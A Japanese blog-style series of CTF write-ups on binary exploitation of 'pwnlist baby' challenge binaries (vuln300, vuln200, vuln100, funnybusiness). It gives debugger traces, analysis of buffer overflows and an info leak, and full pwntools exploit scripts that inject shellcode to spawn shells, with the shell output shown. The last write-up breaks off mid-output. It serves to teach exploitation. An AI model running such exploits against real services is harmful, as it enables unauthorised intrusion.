pwnlist baby vuln300
下調べ
mattun-mart@4ctf:~/pwn/baby/vuln300$ file vuln300 | sed -e "s/,/\n/g" vuln300: ELF 32-bit LSB executable Intel 80386 version 1 (SYSV) dynamically linked (uses shared libs) for GNU/Linux 2.6.18 BuildID[sha1]=4bc2aae29f861432a873713b1581ac3dbad84cae stripped
mattun-mart@4ctf:~/pwn/baby/vuln300$ checksec.sh --file vuln300 RELRO STACK CANARY NX PIE RPATH RUNPATH FILE No RELRO No canary found NX disabled Not an ELF file No RPATH No RUNPATH vuln300
NXやSSPなし.
実行ファイルはubuntu14.04 64bitで動かしてます.
解析
実行してみると,数値とメッセージの入力を促される.
それぞれ入力すると,入力した数値分のアルファベットと入力メッセージが表示されてプログラムが終了する.
mattun-mart@4ctf:~/pwn/baby/vuln300$ ./vuln300 Input Num : 5 Input Msg : hoge Reply : ABCDEhoge
入力内容を変えていろいろ遊んでいると数値に負数を入力したときにプログラムが落ちることがわかる.
mattun-mart@4ctf:~/pwn/baby/vuln300$ ./vuln300 Input Num : -5 Input Msg : aaaaa Segmentation fault
ということで,具体的にバイナリを解析していく.
デバッガ等で動作を追っていくとざっくりと以下のような流れで動作をしていることがわかった.
- 数値とメッセージの入力を受け取る
- 入力された数の絶対値分だけアスキーコードAから順に文字を生成
- 入力されたメッセージを別の領域にコピー
- 生成した文字列と入力したメッセージが連結された文字列を表示
次にプログラムが落ちた原因を探っていく.
次のコードは‐5を入力したときプログラムが落ちてしまった箇所である.
[----------------------------------registers-----------------------------------]
EAX: 0x41414141 ('AAAA')
EBX: 0x804a008 ("AAAAAAA\n")
ECX: 0xf7d58790 (mov WORD PTR [edi],dx)
EDX: 0x0
ESI: 0x0
EDI: 0x0
EBP: 0xffffd0f8 --> 0x0
ESP: 0xffffd0e0 --> 0x804a008 ("AAAAAAA\n")
EIP: 0x804882a (mov edx,DWORD PTR [eax])
EFLAGS: 0x10287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048820: call 0x8048840
0x8048825: mov eax,DWORD PTR [ebp-0xc]
0x8048828: mov eax,DWORD PTR [eax]
=> 0x804882a: mov edx,DWORD PTR [eax]
0x804882c: mov eax,DWORD PTR [ebp-0xc]
0x804882f: mov DWORD PTR [esp],eax
0x8048832: call edx
0x8048834: mov eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd0e0 --> 0x804a008 ("AAAAAAA\n")
0004| 0xffffd0e4 --> 0x80491e0 ("AAAAAAAA\n")
0008| 0xffffd0e8 --> 0xfffffffb
0012| 0xffffd0ec --> 0x804a008 ("AAAAAAA\n")
0016| 0xffffd0f0 --> 0xfffffffb
0020| 0xffffd0f4 --> 0xf7e77000 --> 0x1acda8
0024| 0xffffd0f8 --> 0x0
0028| 0xffffd0fc --> 0xf7ce3af3 (<__libc_start_main+243>: mov DWORD PTR [esp],eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804882a in ?? ()本来EAXにcallで呼び出す関数アドレスを格納するアドレスが入っているはずのところが,‐5を入力したせいで入力したメッセージの一部(AAAA)で書き変わってしまっている.
アドレスが書き変わってしまった原因を詳しく探っていくと次のコードの部分に問題があることがわかった.
[----------------------------------registers-----------------------------------]
EAX: 0x7fb
EBX: 0x804a008 --> 0x8048a60 --> 0x8048924 (push ebp)
ECX: 0x804a00c ("ABCDE")
EDX: 0xfffffffb
ESI: 0x0
EDI: 0x0
EBP: 0xffffd0d8 --> 0xffffd0f8 --> 0x0
ESP: 0xffffd0cc --> 0x804a008 --> 0x8048a60 --> 0x8048924 (push ebp)
EIP: 0x80488c4 (lea edx,[ecx+edx*1])
EFLAGS: 0x212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80488bb: mov edx,DWORD PTR [ebp+0x8] # 関数呼び出し先のアドレスを格納するアドレスをedxに移動
0x80488be: lea ecx,[edx+0x4] # 入力した数値分のAから始まる文字が格納されたアドレスをecxに移動
0x80488c1: mov edx,DWORD PTR [ebp+0x10] # 入力した数値をedxに移動
=> 0x80488c4: lea edx,[ecx+edx*1] # 入力メッセージのコピー先アドレスを計算してedxに格納
0x80488c7: mov DWORD PTR [esp+0x8],eax
0x80488cb: mov eax,DWORD PTR [ebp+0xc]
0x80488ce: mov DWORD PTR [esp+0x4],eax
0x80488d2: mov DWORD PTR [esp],edx
[------------------------------------stack-------------------------------------]
0000| 0xffffd0cc --> 0x804a008 --> 0x8048a60 --> 0x8048924 (push ebp)
0004| 0xffffd0d0 --> 0x804a008 --> 0x8048a60 --> 0x8048924 (push ebp)
0008| 0xffffd0d4 --> 0x0
0012| 0xffffd0d8 --> 0xffffd0f8 --> 0x0
0016| 0xffffd0dc --> 0x8048825 (mov eax,DWORD PTR [ebp-0xc])
0020| 0xffffd0e0 --> 0x804a008 --> 0x8048a60 --> 0x8048924 (push ebp)
0024| 0xffffd0e4 --> 0x80491e0 ("AAAAAAAA\n")
0028| 0xffffd0e8 --> 0xfffffffb
[------------------------------------------------------------------------------]このコードはstrncpy命令を使った入力メッセージコピー処理の前準備であり,ベースとなるアドレス(ecx)に入力した数値(edx)を足したアドレスをコピー先のアドレスとして指定している.
しかしスタックの中身は次のようになっているため,入力された数値とメッセージの組み合わせによっては,後にcallで呼び出す関数のアドレスを格納しているアドレスを書き換えてしまう.
例えば,負数に‐4,メッセージにAAAAを入力すると後にcallで呼び出す関数のアドレスを格納しているアドレスを0x41414141に書き換えることができる.
Exploit
後にcallで呼び出す関数のアドレスを格納しているアドレスをメッセージの入力内容で自由に書き換えることが可能なことがわかったので,ここにシェルコードを積んでシェルを起動してあげればよさそう.
運のいいことに後にcallで呼び出す関数のアドレスを格納しているアドレスはbss領域にあり,PIEが無効になっているため,ASLRが有効でもこのアドレスは変化しない.
あとはcallの呼び出し方に注意しながらアドレスとシェルコードを積んであげればOK
ってことでExploit.
#/usr/bin/env python # -*- coding:utf-8 -*- from pwn import * import struct import time conn = process('./vuln300') elf = ELF('./vuln300') vtable_addr = 0x80491e0 shellcode = asm(shellcraft.sh()) input_num = "-4\n" conn.send(input_num) conn.recv() payload = p32(vtable_addr + 4) + p32(vtable_addr + 8) + shellcode payload += "\n" conn.send(payload) conn.recv() sleep(2) conn.interactive()
結果
mattun-mart@4ctf:~/pwn/baby/vuln300$ python exploit.py
[+] Starting local process './vuln300': pid 6387
[*] '/home/mattun-mart/pwn/baby/vuln300/vuln300'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[*] Switching to interactive mode
$ ls
core dump exploit.py peda-session-vuln300.txt vuln300内定式等の関係でまとめるのが遅くなってしまった...
一応自分用にざっくりまとめてるけど間違ってたら教えてください.
pwnlist baby vuln200
下調べ
mattun-mart@4ctf:~/pwn/baby/vuln200$ file vuln200 | sed -e "s/,/\n/g" vuln200: ELF 32-bit LSB executable Intel 80386 version 1 (SYSV) dynamically linked (uses shared libs) for GNU/Linux 2.6.24 BuildID[sha1]=b0adbe78fb249940c782b5118d9bf3f06328a22f stripped
mattun-mart@4ctf:~/pwn/baby/vuln200$ checksec.sh --file vuln200 RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX disabled Not an ELF file No RPATH No RUNPATH vuln200
NXやSSPが無効.これもどっかにシェルコード積んでやればよさそう.
ubuntu14.04 64bitで動かしてます.
解析
straceで動かすとポート7777で待ち受けていことがわかる.あと/logs/pwn2logが開けなくて落ちてるので作ってやる.
以下はstraceの一部.
open("./logs/pwn2log", O_WRONLY|O_CREAT|O_APPEND, 0666) = -1 ENOENT (No such file or directory)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x46} ---
+++ killed by SIGSEGV +++
Segmentation faultんで接続してみるとCODEGATE 2013 Util serviceが待ってる.
表示されるメニューの文字を入力すると書く方式で入力値を変換してくれる.
mattun-mart@4ctf:~/pwn/baby/vuln200$ nc localhost 7777 CODEGATE 2013 Util service! [*] md5 [*] help [*] base64 encode [*] base64 decode [*] quit
大量の文字を送ってみたりといろいろ遊んでみるも特にバグらしいものが見当たらない.
しいて言うならば,継続して同じ変換を行う際に前回の入力内容より短い文字を送ると前回の入力内容が残ったまま変換されるので正しく変換できてないことぐらい.
ってことでバイナリを解析していく.
デバッガ起動するとデバッガを検知したというメッセージが表示されるが,メッセージが表示されるだけなので問題ない.
解析していくと次のような流れで動作していた.
- 入力された内容を受け取る
- 受け取った文字列がメニューの内容と一致するかチェック
- 一致したら各変換処理へ移行.間違っていたら再度メニュー表示
- 変換したい値を受け取り,変換後の値を表示.
- キーボードから何か入力されるとメニュー画面を表示.1に戻る.
入力文字数は制限されていてスタック領域を破壊するなどの問題はなさそうだった.
んで,どこに問題があるかというと,隠しメニューwrite.
以下のように,メニューで受け取った文字列(hoge)とwriteを比較していた.
[----------------------------------registers-----------------------------------]
EAX: 0x8049c3a ("write")
EBX: 0xffffce9c --> 0x0
ECX: 0x5
EDX: 0xffffcfa0 ("hoge\n")
ESI: 0xffffcfa0 ("hoge\n")
EDI: 0x8049c3a ("write")
EBP: 0xffffcf88 --> 0xffffd178 --> 0x0
ESP: 0xffffcb70 --> 0x0
EIP: 0x804901f (repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi])
EFLAGS: 0x200286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8049016: mov ecx,0x5
0x804901b: mov esi,edx
0x804901d: mov edi,eax
=> 0x804901f: repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
0x8049021: seta dl
0x8049024: setb al
0x8049027: mov ecx,edx
0x8049029: sub cl,al
バイナリを追っていくとどうやらwriteはメニューで入力したwrite以降の文字列(以下の例ではhogeshi)を別のスタック領域にコピーするようだ.
このときwrite処理前後のコピー先スタック領域のダンプ結果dump.txtをカレントディレクトリに生成してる.
[*] md5 [*] base64 encode [*] base64 decode [*] help [*] quit writehogeshi write running Copying bytes DONE Return to the main
[----------------------------------registers-----------------------------------]
EAX: 0xffffce9c --> 0x0
EBX: 0xffffce9c --> 0x0
ECX: 0x9 ('\t')
EDX: 0xffffcfa5 (" hogeshi\n")
ESI: 0xffffcfa5 (" hogeshi\n")
EDI: 0x8049c3f --> 0x46454200 ('')
EBP: 0xffffcf88 --> 0xffffd178 --> 0x0
ESP: 0xffffcb70 --> 0xffffce9c --> 0x0
EIP: 0x8049088 (call 0x8048810 <memcpy@plt>)
EFLAGS: 0x200206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804907d: mov DWORD PTR [esp+0x8],ecx
0x8049081: mov DWORD PTR [esp+0x4],edx
0x8049085: mov DWORD PTR [esp],eax
=> 0x8049088: call 0x8048810 <memcpy@plt>
0x804908d: lea eax,[ebp-0xec]
0x8049093: mov DWORD PTR [esp+0x4],eax
0x8049097: mov DWORD PTR [esp],0x8049c63
0x804909e: call 0x80493b1
Guessed arguments:
arg[0]: 0xffffce9c --> 0x0 # 4つ前の命令lea eax,[ebp-0xec]で指定
arg[1]: 0xffffcfa5 (" hogeshi\n")
arg[2]: 0x9 ('\t')
まぁこの処理コピー先の領域の大きさなんて考えていないのでmemcpyで確保したスタック領域を破壊できる.
具体的にはスタックは下図のようになっているので0xEC+4文字以上入力するとEIPを書き換えることができる.
Exploit
EIP奪えたので後は好き勝手やるだけ.
今回はNXが無効なので,どっかにシェルコード積んでシェルを起動する.
スタックのアドレスはリークできそうにもないので.bss領域にシェルコードを乗せてやることにする.
.bss領域への書き込みはrecv関数で行う.
ってことでExploitコード.
.bss領域のアドレスはreadelfコマンドで調べた.
#!/usr/bin/env python # -*- coding:utf-8 -*- from pwn import * import struct host = 'localhost' port = 7777 conn = remote(host, port) bss_addr = 0x804b0a0 elf = ELF('./vuln200') recv_plt_addr = elf.plt['recv'] shellcode = asm(shellcraft.dupsh(4)) shellcode += asm(shellcraft.sh()) ret_addr = p32(recv_plt_addr) + p32(bss_addr) + p32(4) + p32(bss_addr) + p32(len(shellcode)) + p32(0) payload = "write" payload += "A" * 240 payload += ret_addr payload += "\n" conn.send(payload) conn.recv() conn.send(shellcode) conn.interactive()
結果
mattun-mart@4ctf:~/pwn/baby/vuln200$ python exploit.py
[+] Opening connection to localhost on port 7777: Done
[*] '/home/mattun-mart/pwn/baby/vuln200/vuln200'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[*] Switching to interactive mode
$ ls
dump
dump.txt
exploit.py
logs
peda-session-vuln200.txt
vuln200vuln100のほうが難しかった気がする.
解析さえちゃんとできれば割とすぐ解ける.
pwnlist baby vuln100
下調べ
mattun-mart@4ctf:~/pwn/baby/vuln100$ file vuln100 | sed -e "s/,/\n/g" vuln100: ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked (uses shared libs) for GNU/Linux 2.6.24 BuildID[sha1]=405654ce20fe1b9e5b8cd57c1299ce770f8d3b5d stripped
mattun-mart@4ctf:~/pwn/baby/vuln100$ checksec.sh --file vuln100 RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX disabled Not an ELF file No RPATH No RUNPATH vuln100
Ubuntu14.04 64bitで動かしてます.
NX,SSP無効.スタック等にシェルコード乗せて実行させるパターンかな.
解析
とりあえず実行する.何かを待ち受けてる.straceで実行してみるとポート6666で接続を待ち受けていることがわかる.
いわゆるfork-server型の問題.
ncコマンドで接続してみるとクイズゲームが始まる.
mattun-mart@4ctf:~/pwn/baby/vuln100$ nc localhost 6666 Welcome to CODEGATE2013. This is quiz game. Solve the quiz. It is Foot Ball Club. This Club is an English Primier league football club. This Club founded 1886. This club Manager Arsene Wenger. This club Stadium is Emirates Stadium. What is this club? (only small letter)
面倒なのでStringコマンドで答えらしき文字列がないか探すが,見つからず仕方なくgoogle先生で検索して答えていく.(バイナリ解析していてわかったが,MD5のハッシュ値で入力された答えが正しいか判定していた)
クイズに3問正解するとニックネームの入力を促される.
rank write! your nickname: AAAAAAAAAAAA AAAAAAAAAAA very good ranke game the end
これでプログラムは終了.
ニックネーム入力の部分にいろいろ入力してると改行を送った時と大量に文字を送った時バグった.
改行を送った時は変な文字が表示されていて,大量に文字を送った時はgame the endが表示されずに途中でプログラムが落ちている.
改行文字を送った時
rank write! your nickname: z very good ranke game the end
大量の文字を送った時
good!3 rank write! your nickname: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
おそらく,終端文字挿入していないのと,バッファーオーバーフローしてEIPが変なところに飛んでいるのがそれぞれのバグの原因.
あとは実際にバイナリの中身を見ないとわからないのでobjdumpやgdb-peda等で解析していく.
解析してみると次のような動きをしていることがわかった.
- 各問題の入力内容をrecvで受け取り,受け取った入力内容のMD5のハッシュ値と答えのハッシュ値を比較.間違っていた場合はプログラム終了.
- 3問すべて正解していた場合はユーザからニックネームの入力内容をrecvで受け取る.
- 受け取ったニックネームの入力内容をスタック内の別領域にmemcpyでコピー.
- コピーしたアドレスにニックネームの入力内容をstrcpyでコピー.
- コピー先アドレスに格納されているニックネームの入力内容を2文字削ってsendで送る.
- very good rankeとgame the endをsendで送ってプログラム終了
それで,どんなバグがあるの?
1. memcpyでバッファオーバーフローが起こる
下図に示すようにニックネームの入力内容のコピーを保存する領域の下にstrcpyの引数であるコピー先アドレスを格納する領域がある.
そのため,大量に文字を送られるとこれが書き換えられてしまう.
具体的には0x108(264)文字を超える文字を入力するとstrcmpの引数であるコピー先アドレスが書き変わる.
これでニックネームの入力内容を好きな場所に書き込めることがわかった.
2. 極端に短い文字を入力に送るとスタックの中身がリークできる
例えば終端文字\x00をニックネームの入力として送ってみるとこんな感じで楽しいことになる.
mattun-mart@4ctf:~/pwn/baby/vuln100$ python test2.py
[+] Opening connection to localhost on port 6666: Done
\x00\x00��\xff\xff\x7f\x00\x00xYd��\x00\x00\x00\x00\x00\x00\x00\x00\x00����\xff\x7f\x00\x00\x90
@\x00\x00\x00\x00\x00`w\x9f��\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98��\xff\xff\x7f\x00\x00\x80��\xff\xff\x7f\x00\x00p��\xff\xff\x7f\x00\x000\xa6��\x00\x00\x00\x00\x00\x00\x00\x00\x00����\xff\x7f\x00\x00\x90
@\x00\x00\x00\x00\x00Y\x0c@\x00\x00\x00\x00\x000��\xff\x03\xfe\xff\xff��\xff\xff\xff\x7f\x00\x000�L�,\xab�1s\x8c\xaa\xad\x89��\x00\x00\x00,\xab�1s\x8c\xaa\xad\x89��\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000��\xff\xff\x7f\x00\x00\x90
@\x00\x00\x00\x00\x00\x10���\xff\x7f\x00\x00���\xff\xff\x7f\x00\x000��\xff\xff\x7f\x00\x00h\x12@\x00\x00\x00\x00\x00\x10��\xff\xff\x7f\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x18���\xff\x7f\x00\x00\x10K\xfe�\x0030f54cbe2cabf23173198caaad89e7b9\x00\x00\x00\x00\x00\x00\x00\xa\x00\x00\x00\x00\x00He is South Korean singer, songwriter, rapper, dancer and record producer. He is known domestically for his humorous videos and stage performances, and internationally for his hit single Gangnam Style. Who is he?(only small letter)
\x00�v��\x7f\x00\x00eece6865e633b0ca4b5c0b32f21edfa2\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00It is a royal palace locate in northern Seoul, South Korea. First constructed in 1395, laster burned and abandoned for almost three centuries, and then reconstructed in 1867, it was the main and largest place of the Five Grand Palaces built by the joseon Dynasty. What is it?(only small letter)
\x00��\xff\xff\xff\x7f\x00\x001c5442c0461e5186126aaba26edd6857\x00\x00\x00\x00\x00\x00\x00\x00\x00F\xfe��\x00It is Foot Ball Club. This Club is an English Primier league football club. This Club founded 1886. This club Manager Arsene Wenger. This club Stadium is Emirates Stadium. What is this club? (only small letter)
\x00\xff\x7f\x00\x00��\xff\xff\x10\x00\x00\x00\x00\x88\x95\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00psy��\x00\x00\x00\x00\x00\x00\x00\x00\x00gyeongbokgung\x00\x00\x00arsenal\x00\xb5\x13@\x00\x00\x00\x00\x00\x100`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x100`\x00\x00\x00\x00\x00\x90
@\x00\x00\x00\x00\x00\x100`\x00\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Eoe��\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18���\xff\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00�
@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00�C<ghmA_ very good ranke
game the end
\x00
何でこんなことになっているかというと
以下のように,rdxに入力した文字数が格納されたraxから0x2引いた値が格納されることが原因.
RAX: 0x0
RBX: 0x0
RCX: 0xfffffffffffffffe
RDX: 0xfffffffffffffffe
RSI: 0x7fffffffe018 --> 0x7fffffffe300 --> 0x7fffffffe339 --> 0x3cf32b80e1f2070
RDI: 0x7fffffffd9e1 --> 0x7800007fffffffda
RBP: 0x7fffffffdf30 --> 0x0
RSP: 0x7fffffffdb00 --> 0x7fffffffdc10 ("am Style. Who is he?(only small letter)\n")
RIP: 0x401252 (mov rsi,QWORD PTR [rip+0x200e7f] # 0x6020d8)
R8 : 0x0
R9 : 0x0
R10: 0x7fffffffd790 --> 0x0
R11: 0x7ffff77b0fa0 --> 0xfff239c0fff239b0
R12: 0x400a90 (xor ebp,ebp)
R13: 0x7fffffffe010 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x401247: not rax
0x40124a: sub rax,0x1
0x40124e: lea rdx,[rax-0x2] # rdxはsendで送るデータのサイズが入る
=> 0x401252: mov rsi,QWORD PTR [rip+0x200e7f] # 0x6020d8
0x401259: mov eax,DWORD PTR [rbp-0x8]
0x40125c: mov ecx,0x0
0x401261: mov edi,eax
0x401263: call 0x400a20 <send@plt>
このrdxにはsendで送るデータサイズの値が入っており,1文字以下だとsendのサイズがとんでもなくでかくなってしまう.
0x401259: mov eax,DWORD PTR [rbp-0x8] 0x40125c: mov ecx,0x0 0x401261: mov edi,eax => 0x401263: call 0x400a20 <send@plt> 0x401268: mov eax,DWORD PTR [rbp-0x8] 0x40126b: mov ecx,0x0 0x401270: mov edx,0x10 0x401275: mov esi,0x401523 Guessed arguments: arg[0]: 0x4 arg[1]: 0x7fffffffd9e0 --> 0x7fffffffda00 --> 0x400a90 (xor ebp,ebp) arg[2]: 0xfffffffffffffffe # 送るデータサイズ arg[3]: 0x0
つまり,コピーしたニックネームデータ以降のスタックの中身を送ってしまうことになる.これがよくわからない文字列の正体.
ここでさっきのスタックの図を見ればわかるが,nickname_copy_dataの先にはnickname_copy_dataのアドレスが格納されている.
ということは,リークしたスタックの中身からニックネームの入力データが入ったアドレスを特定できるので,ニックネームの入力にシェルコード積んでここに飛んでやれば良さそう.
今回fork-server型の問題なので親プロセスが死なない限り,リークしたスタックのアドレスが変わることもない.
Exploit
ってことで,Exploitを組み立てていく.
NXとSSPが無効なので,ニックネームの入力にシェルコードを積んで,どうにかしてリークしたスタックから得たニックネームの入力(memcpyのコピー)を格納したアドレスに飛んでやればよさそう.
ただ,どうやってスタックのリターンアドレスを書き換えるかが問題.
memcpyのコピーの時にリターンアドレスを書き換えてやるのが一番楽そうだが,リターンアドレスの前にstrcpyのコピー先アドレスを格納する領域が邪魔でうまくいかない.
コピー先アドレスを格納する部分だけにアドレスを書いておいてプログラムが落ちないようにし,リターンアドレスを書き換える方法も考えられるが,アドレスに\x00が入ってしまうためそれ以降の入力を送ることができないのでこれもダメ.
今回はstrcpyの書き込み先は自由に変更できるので,これをうまく利用する.
strcpyのときに0x10ずらして書き込むことでうまくリターンアドレスをシェルコードを積んでいるニックネームの入力を保存している領域のアドレスに指定できる.
下の図のような流れ.青い枠はニックネームの入力.(わかりづらくてすみません...)
あとはExploit書く.
#!usr/bin/env python # -*- coding:utf-8 =*- from pwn import * import struct import time context.arch = 'amd64' host = 'localhost' port = 6666 def solve_quiz(conn): conn.send("arsenal\n") time.sleep(0.01) conn.send("gyeongbokgung\n") time.sleep(0.01) conn.send("psy\n") time.sleep(0.01) def leak_stack_addr(conn): solve_quiz(conn) conn.send("\x00") conn.recvuntil("nickname:") leak_stack = conn.recv() leak_addr = u64(leak_stack[266:272] + "\x00\x00") return leak_addr conn = remote(host,port) leak_addr = leak_stack_addr(conn) shellcode = asm(shellcraft.dupsh(4)) shellcode += asm(shellcraft.sh()) payload = shellcode payload += "A" * (264 - len(shellcode)) payload += p64(leak_addr + 16) print hex(leak_addr) conn = remote(host,port) solve_quiz(conn) conn.send(payload) time.sleep(0.1) conn.recv() conn.interactive()
結果
mattun-mart@4ctf:~/pwn/baby/vuln100$ python exploit2.py [+] Opening connection to localhost on port 6666: Done 0x7fffabd7efd0 [+] Opening connection to localhost on port 6666: Done [*] Switching to interactive mode $ ls dump etest.py exploit.py exploit2.py peda-session-ls.txt peda-session-vuln100.txt test2.py vuln100 $ exit [*] Got EOF while reading in interactive
無事シェルが起動.
やったことまとめるのめっちゃ時間かかるなぁ...
pwnlist baby funnybusiness
下調べ
$ file funnybusiness | sed -e "s/,/\n/g" funnybusiness: ELF 32-bit LSB executable Intel 80386 version 1 (SYSV) dynamically linked (uses shared libs) for GNU/Linux 2.6.24 BuildID[sha1]=97b05818b1ef9a9383e922e10e1e43ce7a96389e stripped
$ checksec.sh --file funnybusiness RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX disabled Not an ELF file No RPATH No RUNPATH funnybusiness
Ubuntu14.04 64bitで動作させてる.
解析
実行してみると何かを待ち受けている.何だろう.
straceで実行するとポート49681で接続待ち受けしていることがわかった.いわゆるfork-server型の問題.
ncで接続するがfunnybusinessというユーザが存在しないとサーバ側でエラーが吐かれて接続が切れた.
gdb-pedaやobjdumpを駆使してバイナリの中身を追っていくと,文字列funnybusinessを引数に取ってgetpwnam関数が呼ばれていた.
getpwname関数について調べてみる.
getpwnam() 関数は、ユーザ名 name にマッチするパスワード・データベースのエントリを要素毎に分解し、各要素を格納した構造体へのポインタを返す
(パスワード・データベースの例: ローカルのパスワードファイル /etc/passwd,NIS, LDAP)
つまり,先ほどのエラーはOSにfunnybusinessという名前のユーザがいないことが原因のようだ.
OSにfunnybusinessユーザを追加して再度実行.(getpwnameを使っているので管理者権限で実行する必要あり).
うまく動いたっぽい...が,画面に何も表示されない.
さらにバイナリの中身を追っていくと,次のような動作をすることが分かった.
- 1回目のrecvでユーザが送るデータのサイズを受け取る
- 2回目のrecvでそのデータを受け取る
- 受け取ったデータを引数にとってinflate関数を実行
inflate関数って何だ...
調べた.
zlibライブラリの関数で,圧縮されたデータの解凍に使われる関数みたい.
さっそくてきとうな文字列を圧縮して送ってみる.
#!/usr/bin/env python # -*- coding:utf-8 -*- from pwn import * import struct import zlib host = 'localhost' port = 49681 conn = remote(host, port) data = "A" * 5000 comp_data = zlib.compress(data) conn.send(p32(len(comp_data))) conn.send(comp_data)
お,なんかeipが変なところへ飛んでる.
送ったデータでリターンアドレスが書き変わってるみたい.
これでeipは奪えたので送ったデータのどの部分がリターンアドレスに対応しているか調べる.
ただし,このままだとリターンアドレスに対応する部分がわかっても,データが圧縮されているので自由にリターンアドレスを指定できない.
どうしたものかとpythonのzlibライブラリの圧縮を見ていると,compress関数は第2引数に0を指定すると無圧縮で圧縮できるらしい.
これで生のデータを送れるので,自由にリターンアドレスを書き換えられる.
上記のコードのAの文字数を20,compress関数に引数0を指定して,再度データを送ってみる.(バイナリを解析しているとわかるが送れるサイズには制限がある)
ret命令が実行されるときのスタックを見てみるとespにA*14が積まれている.
送ったデータは20文字のAなので7番目の文字からリターンアドレスになるようだ.
これで自由にリターンアドレスを指定することができるようになったので,Exploitを組み立てればよい.
Exploit
下調べでもわかっているように,このバイナリはNXとPIEが無効になっている.
.bss領域にシェルコード置いてしまえばシェルが開ける.
あとはどうやって.bss領域にシェルコードを書きこむかだが,recv関数を利用すればよい.
.bss領域のアドレス調べて
$ readelf -S funnybusiness 28 個のセクションヘッダ、始点オフセット 0x2190: セクションヘッダ: [番] 名前 タイプ アドレス Off サイズ ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .interp PROGBITS 08048154 000154 000013 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 08048168 000168 000020 00 A 0 0 4 [ 3] .note.gnu.build-i NOTE 08048188 000188 000024 00 A 0 0 4 [ 4] .gnu.hash GNU_HASH 080481ac 0001ac 000020 04 A 5 0 4 [ 5] .dynsym DYNSYM 080481cc 0001cc 0001d0 10 A 6 1 4 [ 6] .dynstr STRTAB 0804839c 00039c 000121 00 A 0 0 1 [ 7] .gnu.version VERSYM 080484be 0004be 00003a 02 A 5 0 2 [ 8] .gnu.version_r VERNEED 080484f8 0004f8 000030 00 A 6 1 4 [ 9] .rel.dyn REL 08048528 000528 000008 08 A 5 0 4 [10] .rel.plt REL 08048530 000530 0000d0 08 A 5 12 4 [11] .init PROGBITS 08048600 000600 00002e 00 AX 0 0 4 [12] .plt PROGBITS 08048630 000630 0001b0 04 AX 0 0 16 [13] .text PROGBITS 080487e0 0007e0 00074c 00 AX 0 0 16 [14] .fini PROGBITS 08048f2c 000f2c 00001a 00 AX 0 0 4 [15] .rodata PROGBITS 08048f48 000f48 0000d3 00 A 0 0 4 [16] 